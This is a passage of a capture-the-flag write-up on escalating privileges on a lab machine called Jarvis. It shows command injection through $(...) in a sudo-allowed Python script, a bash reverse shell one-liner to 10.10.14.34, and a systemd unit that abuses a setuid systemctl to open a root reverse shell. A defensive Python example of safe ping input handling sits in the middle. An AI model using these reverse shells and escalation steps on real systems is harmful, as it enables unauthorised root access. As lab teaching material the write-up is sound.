Post Exploitation
Privilege Escalation
Analyzing what commands we can run, we note the following:
www-data@jarvis:/var/www/Admin-Utilities$ sudo -l
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
www-data@jarvis:/var/www/Admin-Utilities$
We see that we can run simpler.py as pepper. Analyzing that file, we learn that it does not filter the '$' character, so we can take advantage of that as follows.
www-data@jarvis:/var/www/Admin-Utilities$ ping $(whoami)
ping: www-data: Temporary failure in name resolution
Whatever is in the parentheses is executed first (shell command substitution).
www-data@jarvis:/$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
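On the defensive side, the root cause is a character blacklist in front of a shell string. Below is an added example (not the box's simpler.py, whose source is not shown on this page) of how such a ping wrapper can be written so that $(...) and other shell metacharacters never reach a shell: an allow-list for the target plus an argument list instead of a shell command line. The function names are assumptions.

```python
import ipaddress
import re
import subprocess
from typing import List

# RFC 1123 style hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, 253 characters at most.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def is_safe_target(target: str) -> bool:
    """Allow only an IPv4/IPv6 literal or a plain hostname.

    Everything else is rejected, so '$', '(', ')', ';', '|', backticks and
    whitespace can never pass, whatever blacklist the caller forgot.
    """
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return bool(_HOSTNAME_RE.match(target))


def ping_command(target: str) -> List[str]:
    """Build the argv list for ping; raise instead of passing bad input on."""
    if not is_safe_target(target):
        raise ValueError(f"refusing to ping {target!r}: not a hostname or IP address")
    # Argument list, no shell=True: nothing in `target` is interpreted by bash,
    # so "$(whoami)" would be handed to ping as a literal (and rejected above anyway).
    return ["/bin/ping", "-c", "1", target]


def ping(target: str) -> int:
    """Run the validated ping and return its exit status."""
    return subprocess.run(ping_command(target), check=False).returncode
```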
Running the following gave me a better shell:
bash -i >& /dev/tcp/10.10.14.34/4444 0>&1
Running LinEnum.sh, we learn the following:

The systemctl binary has the setuid bit set and it’s owned by root. We can use that to our advantage and escalate to root privileges. If you’re not sure how to do that, you can search the binary name on GTFOBins and check how the suid bit can be used to escalate privileges.
Steps to create a service
On our attacker machine, create a file named root.service with the following content:
[Unit]
Description=get root privilege
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.34/9999 0>&1'
[Install]
WantedBy=multi-user.target
Copy it to our target machine and run the following:
/bin/systemctl enable /home/pepper/root.service
Set up your listener and run the following to start the service:
/bin/systemctl start root